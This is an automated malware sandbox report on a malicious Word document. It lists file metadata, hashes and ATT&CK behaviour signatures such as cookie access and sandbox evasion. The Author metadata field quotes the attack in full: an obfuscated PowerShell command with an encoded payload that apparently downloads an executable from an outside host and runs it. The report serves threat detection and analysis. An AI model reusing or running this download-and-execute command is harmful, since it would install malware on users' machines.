Managed XDR
Group-IB MDP Report
File info
Filename: 04665ae85b968c9c3962b3f9abafada97052.doc
File Type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: POWERSHell.eXe -ExecUtIoNpOlIcy BYPaSS -noprOFiLe -WiNDoWsTYle HiDdeN -ENCoDEdCoMmaNd IAAgACgAbgBlAFcALQBvAEIAagBlAEMAVAAgAHMAWQBzAHQAZQBNAC4ATgBlAFQALgBXAGUAQgBjAEwAaQBFAG4AdAApAC4AZABPAFcAbgBMAE8AYQBEAGYAaQBMAEUAKAAgACAAHSBoAHQAdABwADoALwAvAHcAdwB3AC4AbgBvAGkAbgBhAHUAcABoAG8ALgBjAG8AbQAuAHYAbgAvAGYAaQBsAGUAcwAvAGEAbgBuAGEALgBlAHgAZQAdICAAIAAsACAAIAAdICQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAcABzAHMAdAAuAGUAeABlAB0gIAAgACkAIAAgADsAIAAgAFMAVABhAFIAVAAgACAAHSAkAEUATgB2ADoAYQBQAHAAZABhAFQAQQBcAHAAcwBzAHQALgBlAHgAZQAdIA==, Template: Normal.dotm, Last Saved By: Eternal, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Aug 11 05:36:00 2017, Last Saved Time/Date: Fri Aug 11 05:37:00 2017, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0
File Size: 480.5 KB
Env info
win7/x86 en
Hashes
SHA1: f628e344719fdfcaed4b27d329a7eeba9cf1995d
SHA256: 25fea3dba9070b97de3ffdb29f49150e7e388be4a02140ea1173a55ac9383f1f
MD5: 5cfdc6eb9a74295ad015d7c54eac61db
Signatures
Execution
T1204.002 office_vb_load: Microsoft Office is loading VB DLL files (macros usage indicator)
Privilege Escalation
T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process
Defense Evasion
T1497 evasion_trustrecords: Attempts to detect Sandbox exploring trusted documents
T1497.001 antivm_queries_computername: Retrieves the computer name
T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process
Credential Access
T1555.003 cookie_files: Accesses cookie files
T1552 cookie_files: Accesses cookie files
Discovery
T1083 checks_recent_files: Attempt to check recently opened files through registry
T1135 server_share_info: Retrieves information about each shared resource on a server
T1497 evasion_trustrecords: Attempts to detect Sandbox exploring trusted documents
T1497.001 antivm_queries_computername: Retrieves the computer name
Other
yara_rules: Static rules
create_rpc_bindings: Creates RPC connection
error_drawtext: An error occured while executing the file
get_policy_info: Retrieves information about a Policy object
test_check_service: Starts services
antisandbox_check_graphics_card: Uses CreateDXGIFactory, potentially to detect graphics card
next report: 58b359d6-cfbb-4666-9070-a6dbfdba957d
previous report: 5bdfdd52-eceb-43d4-b05f-76d5fb7877d5
Managed XDR